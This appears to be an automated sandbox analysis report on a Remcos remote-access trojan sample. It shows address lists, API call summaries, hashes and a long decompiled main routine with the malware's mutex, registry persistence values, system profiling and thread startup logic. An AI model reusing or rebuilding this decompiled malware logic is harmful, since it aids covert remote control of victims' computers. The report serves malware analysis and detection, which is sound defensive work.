                                    0x00000000
                                    0x00000000
                                    0x105914a0
                                    0x105914a3
                                    0x105914a3
                                    0x105914bf
                                    0x105914c2
                                    0x00000000
                                    0x105914c2
                                    0x10591460
                                    0x105914c5
                                    0x105914c5
                                    0x105914c7
                                    0x105914d6
                                    0x00000000
                                    0x105914d6
                                    0x105913a1
                                    0x105913a4
                                    0x105913a6
                                    0x105913a6
                                    0x105913ab
                                    0x00000000
                                    0x00000000
                                    0x105913b2
                                    0x105913b5
                                    0x105913b9
                                    0x105913bb
                                    0x105913bb
                                    0x105913c0
                                    0x105913c9
                                    0x105913cd
                                    0x00000000
                                    0x105913d3
                                    0x105913d3
                                    0x105913d5
                                    0x105913d8
                                    0x105913dc
                                    0x00000000
                                    0x00000000
                                    0x105913e4
                                    0x105913f1
                                    0x105913e6
                                    0x105913e6
                                    0x105913e6
                                    0x105913fc
                                    0x105913fe
                                    0x10591402
                                    0x10591402
                                    0x10591408
                                    0x00000000
                                    0x10591408
                                    0x105913cd
                                    0x00000000
                                    0x105913a6
                                    0x10591393
                                    0x10591393
                                    0x10591378
                                    0x10591381
                                    0x1059138a
                                    0x00000000
                                    0x1059138a
                                    0x105912e3
                                    0x105912eb
                                    0x105912f3
                                    0x00000000
                                    0x00000000
                                    0x105912f5
                                    0x105912f7
                                    0x10591306
                                    0x10591319
                                    0x1059131b
                                    0x1059131c
                                    0x1059131d
                                    0x10591326
                                    0x10591327
                                    0x10591332
                                    0x10591334
                                    0x10591334
                                    0x10591336
                                    0x10591338
                                    0x1059133a
                                    0x00000000
                                    0x1059133a
                                    0x10591329
                                    0x1059132c
                                    0x1059132c
                                    0x00000000
                                    0x1059132c
                                    0x10591321
                                    0x00000000
                                    0x10591321
                                    0x00000000
                                    0x105912f7
                                    0x10591282
                                    0x10591286
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • LoadLibraryA.KERNELBASE(00079038,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105913C9
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: e8295adf4cf91ce3d1e71315a4843ea83c5309d34d73cf038304c1049df78913
                                    • Instruction ID: e1892e3f732a2c009111406d2261d1ca8ffd7ecb4d6a59bc074b5b7fbd1b7348
                                    • Opcode Fuzzy Hash: e8295adf4cf91ce3d1e71315a4843ea83c5309d34d73cf038304c1049df78913
                                    • Instruction Fuzzy Hash: DBC18C71A00225AFDB14CF69CC84B9EBBB5FF88350F258569E809AB655D730ED01CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006FF8B9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,006FF5A8), ref: 006FF8BE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: e08711f12c8ae5973016edb18573fd2e6fc80f4e70d009887161a4e4e44f31f8
                                    • Instruction ID: 30f007f60a4d484de15dac7affe268e41558ef4939b15f8872c12dffd39e50b4
                                    • Opcode Fuzzy Hash: e08711f12c8ae5973016edb18573fd2e6fc80f4e70d009887161a4e4e44f31f8
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DC2BE, Relevance: 55.0, APIs: 15, Strings: 16, Instructions: 774synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E006DC2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x73bd28 = _a4;
				_push(_t268);
				E006DCC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E006D20EC(_t268, _t495, __edx, __eflags, 0x73c59c);
				_t496 = _t495 - 0x18;
				E006D20EC(_t268, _t496, __edx, __eflags,  &_v728);
				_t71 = E006E7478( &_v756, __edx);
				_t497 = _t496 + 0x30;
				E006DD458(__edx, _t71);
				E006D1E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x73c578;
					__eflags =  *((char*)(E006D1F95(E006D1E49(0x73c578, _t444, __eflags, 3))));
					 *0x73bb01 = __eflags != 0;
					_t78 = E006D5343(_t268,  &_v756, E006D75E6( &_v780, "Software\\", __eflags, E006D1E49(0x73c578, _t444, __eflags, 0xe)), 0x73c578, __eflags, "\\");
					_t471 = 0x73c518;
					E006D1FD1(0x73c518, _t77, 0x73c518, _t78);
					E006D1FC7();
					E006D1FC7();
					E006D5A0B(_t268, 0x73c5cc, "Exe");
					_t269 = 0;
					E006D1E49(0x73c578, _t77, __eflags, 0x32);
					__eflags =  *(E006D5220(0));
					 *0x73bd4e = __eflags != 0;
					E006D1E49(0x73c578, _t77, __eflags, 0x33);
					_t86 = E006D5220(0);
					__eflags =  *_t86;
					 *0x73bd4f =  *_t86 != 0;
					__eflags =  *0x73bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = E006D1F95(0x73c518); // executed
						_t90 = E006E0885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = E006D1F95(0x73c518);
							E006E0CE2(_t259, __eflags, "Inj");
						}
						E006D1FAD(0x73c548, E006D1E49(_t461, _t447, __eflags, 0xe));
						_t93 = E006D1F95(0x73c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E006D1FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E006DCD09();
							GetModuleFileNameW(0, 0x73bb08, 0x104);
							_t100 = E006E7614(0x73c548);
							_push(0x73c548);
							_t448 = 0x80000002;
							 *0x73beb4 = _t100;
							_t101 = E006E08E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
							_t499 = _t497 + 0xc;
							E006D1FD1(0x73c5b4, 0x80000002, 0x73c5b4, _t101);
							E006D1FC7();
							__eflags =  *0x73beb4;
							if( *0x73beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E006D5A02(_t272, 0x73c5b4, _t462);
							_t105 =  *0x73bd20; // 0x0
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x73a9d0 =  *_t105();
							}
							_t477 = 0x73c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = E006D1E49(0x73c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(E006D1F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x73bd20 - _t462; // 0x0
									if(__eflags != 0) {
										__eflags =  *0x73a9d0 - _t462; // 0x2
										if(__eflags == 0) {
											_t448 = E006D1F95(0x73c518);
											_t254 = E006E083B(0x73c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												E006D5F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E006DA713() - 0xffffffff;
											if(__eflags == 0) {
												E006D6071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E006DD3F7();
							}
							E006D9DC9(_t272, 0x73c4e8, E006D1F95(E006D1E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 4))));
							 *0x73bb02 = __eflags != 0;
							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 5))));
							 *0x73bafb = __eflags != 0;
							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 8))));
							 *0x73bb00 = __eflags != 0;
							__eflags =  *((char*)(E006D1F95(E006D1E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 9));
									_t246 = E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									E006D1EFA(0x73c530,  *_t244, _t244, E006E805B( &_v780,  *_t244, _t246));
									E006D1EF0();
									_t477 = 0x73c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								E00701F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E006D2489();
								_t122 = E006D1F95(0x73c560);
								_t449 = E006D1F95(0x73c518);
								E006E0A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								E006D9DC9(_t272, 0x73c500,  &_v524);
								_t465 = 0x73c578;
								goto L47;
							} else {
								__eflags =  *0x73bb01;
								if(__eflags == 0) {
									E006D9DC9(_t272, 0x73c500, 0x73bb08);
								} else {
									_t229 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0x1e));
									_t231 = E006D1F95(E006D1E49(_t477, _t448, __eflags, 0xc));
									_t233 = E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x73c578;
									_t235 = E006D1F95(E006D1E49(0x73c578, _t448,  *_t231, 0xa));
									E006DA987( *_t233, E006D1F95(E006D1E49(0x73c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E006D2489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E006FF4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									E00701F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = E006D1EEB(0x73c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E006D2489();
								_t216 = E006D1F95(0x73c560);
								_t217 = E006D2489();
								E006E0C80(E006D1F95(0x73c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215);
								E006FF4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x73c578;
								E006D1E49(0x73c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = E006DEAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = E006D1F95(E006D1E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E006D2084(_t272, _t502, _t129);
									_push("licence");
									_t450 = E006D1F95(0x73c518);
									E006E0AA7(0x73c518, _t131);
									_t497 = _t502 + 0x20;
									_t135 = E00706769(_t133, E006D1F95(E006D1E49(_t465, _t131, __eflags, 0x28)));
									 *0x73bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										E006E8F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0, E006E8D28, 0, 0, 0);
									}
									_t137 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0x37));
									_t139 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0x10));
									_t141 = E006D1F95(E006D1E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x73c578;
									_t144 = E00706769(_t142, E006D1F95(E006D1E49(0x73c578, _t450,  *_t137, 0x36)));
									_t146 = E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x11));
									E006D846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E006FF218(_t450, 0x73c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = E006D1E49(0x73c578, _t450, __eflags, 0x35);
										_t203 = E006D1F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E006E5938, _t485, 0, 0);
										_t471 = 0x73c578;
									}
									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E006FF218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = E006D1E49(0x73c578, _t450, __eflags, 0x35);
										_t196 = E006D1F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E006E5938, _t484, 0, 0);
										_t471 = 0x73c578;
									}
									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x73ba75 = 1;
										_t185 = E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x25));
										_t187 = E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										E006D1EFA(0x73c0e0,  *_t185, _t185, E006E800F( &_v780,  *_t185, _t187));
										E006D1EF0();
										__eflags = 0;
										CreateThread(0, 0, E006D1BCD, 0, 0, 0);
										_t471 = 0x73c578;
									}
									__eflags =  *((intOrPtr*)(E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = E006D1F95(E006D1E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00706769(_t180, E006D1F95(E006D1E49(0x73c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E006DA679(_t182);
									}
									E006D1EFA(0x73c584, _t450, _t471, E006E6D9E( &_v772, _t461, __eflags));
									_t360 =  &_v776;
									E006D1EF0();
									_t163 =  *0x73bd14; // 0x0
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0);
									}
									CreateThread(_t269, _t269, E006DD0B5, _t269, _t269, _t269);
									__eflags =  *0x73bd4e;
									if( *0x73bd4e != 0) {
										CreateThread(_t269, _t269, E006DFAC7, _t269, _t269, _t269);
									}
									__eflags =  *0x73bd4f;
									if( *0x73bd4f != 0) {
										CreateThread(_t269, _t269, E006DFFE5, _t269, _t269, _t269);
									}
									_t165 =  *0x73a9d0; // 0x2
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = E006D1E49(0x73c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E006E72DA(_t506, _t224);
									_t226 = E006DCE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E006E0885(E006D1F95(0x73c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							E006E0CE2(E006D1F95(0x73c518), __eflags, "WD");
							E006DFD95();
							L71:
							_push("User");
							L72:
							E006D75C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E006D2084(_t269,  &_v776));
							E006D2084(_t269, _t497 - 4, "[Info]");
							E006E6C80(_t269, _t461);
							_t360 =  &_v784;
							E006D1FC7();
							L73:
							E006E1929();
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E006DD515(_t481, __eflags);
							_t284 = _t481;
							 *_t284 = 0x730788;
							 *_t284 = 0x730744;
							return E007004F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E006DD544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x73c578;
							__ecx = E006D1E49(0x73c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E006DE8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E006DD4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E006D1FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}
































































































                                    0x006dc2be
                                    0x006dc2d4
                                    0x006dc2d9
                                    0x006dc2dc
                                    0x006dc2e1
                                    0x006dc2eb
                                    0x006dc2f0
                                    0x006dc2fa
                                    0x006dc303
                                    0x006dc308
                                    0x006dc30c
                                    0x006dc315
                                    0x006dc31a
                                    0x006dc320
                                    0x006dc387
                                    0x006dc387
                                    0x006dc3a5
                                    0x006dc3a8
                                    0x006dc3ca
                                    0x006dc3d0
                                    0x006dc3d8
                                    0x006dc3e1
                                    0x006dc3ea
                                    0x006dc3f9
                                    0x006dc3fe
                                    0x006dc405
                                    0x006dc416
                                    0x006dc418
                                    0x006dc41f
                                    0x006dc426
                                    0x006dc42b
                                    0x006dc42d
                                    0x006dc434
                                    0x006dc43a
                                    0x006dc462
                                    0x006dc46d
                                    0x006dc477
                                    0x006dc479
                                    0x006dc47b
                                    0x006dc483
                                    0x006dc48a
                                    0x006dc48a
                                    0x006dc4a7
                                    0x006dc4a9
                                    0x006dc4b0
                                    0x006dc4b2
                                    0x006dc4bc
                                    0x006dc4be
                                    0x006dc4c3
                                    0x006dc4d5
                                    0x006dc4dc
                                    0x006dc4e4
                                    0x006dc4e6
                                    0x006dc4e9
                                    0x006dc4ef
                                    0x006dc4f5
                                    0x006dc4fa
                                    0x006dc87d
                                    0x006dc881
                                    0x006dc886
                                    0x00000000
                                    0x006dc500
                                    0x006dc500
                                    0x006dc510
                                    0x006dc516
                                    0x006dc51b
                                    0x006dc526
                                    0x006dc52b
                                    0x006dc534
                                    0x006dc539
                                    0x006dc544
                                    0x006dc54d
                                    0x006dc552
                                    0x006dc55b
                                    0x006dc564
                                    0x006dc55d
                                    0x006dc55d
                                    0x006dc55d
                                    0x006dc569
                                    0x006dc56e
                                    0x006dc573
                                    0x006dc575
                                    0x006dc579
                                    0x006dc579
                                    0x006dc57e
                                    0x006dc583
                                    0x006dc587
                                    0x006dc592
                                    0x006dc599
                                    0x006dc59c
                                    0x006dc59e
                                    0x006dc5a4
                                    0x006dc5a6
                                    0x006dc5ac
                                    0x006dc5d0
                                    0x006dc5d2
                                    0x006dc5d7
                                    0x006dc5d8
                                    0x006dc5da
                                    0x006dc5dc
                                    0x006dc5dc
                                    0x006dc5ae
                                    0x006dc5ae
                                    0x006dc5af
                                    0x006dc5b5
                                    0x006dc5b8
                                    0x006dc5ba
                                    0x006dc5ba
                                    0x006dc5b8
                                    0x006dc5ac
                                    0x006dc5a4
                                    0x006dc59c
                                    0x006dc5f1
                                    0x006dc5f4
                                    0x006dc5f6
                                    0x006dc5f6
                                    0x006dc611
                                    0x006dc62a
                                    0x006dc62d
                                    0x006dc644
                                    0x006dc647
                                    0x006dc65e
                                    0x006dc661
                                    0x006dc674
                                    0x006dc677
                                    0x006dc684
                                    0x006dc689
                                    0x006dc689
                                    0x006dc68c
                                    0x006dc68c
                                    0x006dc68f
                                    0x006dc692
                                    0x006dc692
                                    0x006dc697
                                    0x006dc69b
                                    0x006dc6a8
                                    0x006dc6bd
                                    0x006dc6c2
                                    0x006dc6d5
                                    0x006dc6de
                                    0x006dc6e3
                                    0x006dc6e3
                                    0x006dc69b
                                    0x006dc6e8
                                    0x006dc6ec
                                    0x006dc89c
                                    0x006dc8ab
                                    0x006dc8b3
                                    0x006dc8d1
                                    0x006dc8d3
                                    0x006dc8d8
                                    0x006dc8e8
                                    0x006dc8ed
                                    0x00000000
                                    0x006dc6f2
                                    0x006dc6f2
                                    0x006dc6f9
                                    0x006dc78f
                                    0x006dc6ff
                                    0x006dc70a
                                    0x006dc71c
                                    0x006dc731
                                    0x006dc736
                                    0x006dc73e
                                    0x006dc744
                                    0x006dc75c
                                    0x006dc776
                                    0x006dc77d
                                    0x006dc780
                                    0x006dc781
                                    0x006dc781
                                    0x006dc799
                                    0x006dc7a3
                                    0x006dc7ab
                                    0x006dc7ad
                                    0x006dc7ae
                                    0x006dc7b7
                                    0x006dc7ba
                                    0x006dc7bc
                                    0x006dc7ce
                                    0x006dc7be
                                    0x006dc7c4
                                    0x006dc7c9
                                    0x006dc7c9
                                    0x006dc7d5
                                    0x006dc7de
                                    0x006dc7de
                                    0x006dc7e0
                                    0x006dc7e1
                                    0x006dc7e1
                                    0x006dc7e4
                                    0x006dc7e8
                                    0x006dc7ea
                                    0x006dc7ea
                                    0x006dc7ef
                                    0x006dc7f7
                                    0x006dc7ff
                                    0x006dc80a
                                    0x006dc829
                                    0x006dc82f
                                    0x006dc834
                                    0x006dc837
                                    0x006dc840
                                    0x006dc845
                                    0x006dc851
                                    0x006dc853
                                    0x006dc8f2
                                    0x006dc8f2
                                    0x006dc8fe
                                    0x006dc903
                                    0x006dc909
                                    0x006dc90e
                                    0x006dc91d
                                    0x006dc91f
                                    0x006dc924
                                    0x006dc938
                                    0x006dc943
                                    0x006dc949
                                    0x006dc94b
                                    0x006dc951
                                    0x006dc953
                                    0x006dc955
                                    0x006dc955
                                    0x00000000
                                    0x006dc955
                                    0x006dc94d
                                    0x006dc94d
                                    0x006dc957
                                    0x006dc957
                                    0x006dc95c
                                    0x006dc968
                                    0x006dc968
                                    0x006dc975
                                    0x006dc987
                                    0x006dc999
                                    0x006dc99e
                                    0x006dc9a3
                                    0x006dc9c0
                                    0x006dc9d2
                                    0x006dc9f1
                                    0x006dca09
                                    0x006dca0b
                                    0x006dca54
                                    0x006dca0d
                                    0x006dca0f
                                    0x006dca16
                                    0x006dca22
                                    0x006dca29
                                    0x006dca2b
                                    0x006dca30
                                    0x006dca36
                                    0x006dca48
                                    0x006dca4b
                                    0x006dca4d
                                    0x006dca4d
                                    0x006dca6a
                                    0x006dca6c
                                    0x006dca70
                                    0x006dca77
                                    0x006dca81
                                    0x006dca88
                                    0x006dca8a
                                    0x006dca8f
                                    0x006dca95
                                    0x006dcaa1
                                    0x006dcaa4
                                    0x006dcaa6
                                    0x006dcaa6
                                    0x006dcabb
                                    0x006dcabd
                                    0x006dcac3
                                    0x006dcad0
                                    0x006dcae5
                                    0x006dcaea
                                    0x006dcafd
                                    0x006dcb06
                                    0x006dcb0b
                                    0x006dcb17
                                    0x006dcb19
                                    0x006dcb19
                                    0x006dcb2e
                                    0x006dcb30
                                    0x006dcb49
                                    0x006dcb58
                                    0x006dcb5d
                                    0x006dcb60
                                    0x006dcb63
                                    0x006dcb66
                                    0x006dcb66
                                    0x006dcb7a
                                    0x006dcb7f
                                    0x006dcb83
                                    0x006dcb88
                                    0x006dcb8d
                                    0x006dcb8f
                                    0x006dcb91
                                    0x006dcb94
                                    0x006dcb94
                                    0x006dcba0
                                    0x006dcba2
                                    0x006dcba9
                                    0x006dcbb5
                                    0x006dcbb5
                                    0x006dcbb7
                                    0x006dcbbe
                                    0x006dcbca
                                    0x006dcbca
                                    0x006dcbcc
                                    0x006dcbd1
                                    0x006dcbd1
                                    0x006dcbd3
                                    0x00000000
                                    0x006dcbd5
                                    0x006dcbd5
                                    0x006dcbd8
                                    0x006dcbda
                                    0x00000000
                                    0x006dcbda
                                    0x006dcbd8
                                    0x00000000
                                    0x006dc859
                                    0x006dc85d
                                    0x006dc862
                                    0x006dc865
                                    0x006dc869
                                    0x006dc86e
                                    0x006dc873
                                    0x006dc876
                                    0x006dc878
                                    0x00000000
                                    0x006dc87a
                                    0x006dc87c
                                    0x00000000
                                    0x006dc87c
                                    0x006dc878
                                    0x006dc853
                                    0x006dc6ec
                                    0x006dc43c
                                    0x006dc440
                                    0x006dc453
                                    0x006dc45a
                                    0x006dc45c
                                    0x006dcbef
                                    0x006dcbf9
                                    0x006dcbfe
                                    0x006dcbfe
                                    0x006dcc03
                                    0x006dcc17
                                    0x006dcc26
                                    0x006dcc2b
                                    0x006dcc33
                                    0x006dcc37
                                    0x006dcc3c
                                    0x006dcc3c
                                    0x006dcc41
                                    0x006dcc42
                                    0x006dcc43
                                    0x006dcc48
                                    0x006dcc4d
                                    0x006de032
                                    0x006dc177
                                    0x006dc183
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006dc45c
                                    0x006dc322
                                    0x006dc322
                                    0x006dc326
                                    0x00000000
                                    0x006dc328
                                    0x006dc328
                                    0x006dc32c
                                    0x006dc32e
                                    0x00000000
                                    0x006dc330
                                    0x006dc330
                                    0x006dc331
                                    0x006dc339
                                    0x006dc33d
                                    0x006dc344
                                    0x006dc34e
                                    0x006dc355
                                    0x006dc357
                                    0x006dc35b
                                    0x006dc360
                                    0x006dc364
                                    0x006dc369
                                    0x006dc36d
                                    0x006dc372
                                    0x006dc37b
                                    0x006dc37d
                                    0x006dc37d
                                    0x006dc37e
                                    0x006dc384
                                    0x006dc384
                                    0x006dc32e
                                    0x006dc326

                                    APIs
                                    • OpenMutexA.KERNEL32 ref: 006DC471
                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 006DC483
                                    • CloseHandle.KERNEL32(00000000), ref: 006DC48A
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 006DC4E9
                                    • GetLastError.KERNEL32 ref: 006DC4EF
                                    • GetModuleFileNameW.KERNEL32(00000000,0073BB08,00000104), ref: 006DC510
                                      • Part of subcall function 006DE8BB: __EH_prolog.LIBCMT ref: 006DE8C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
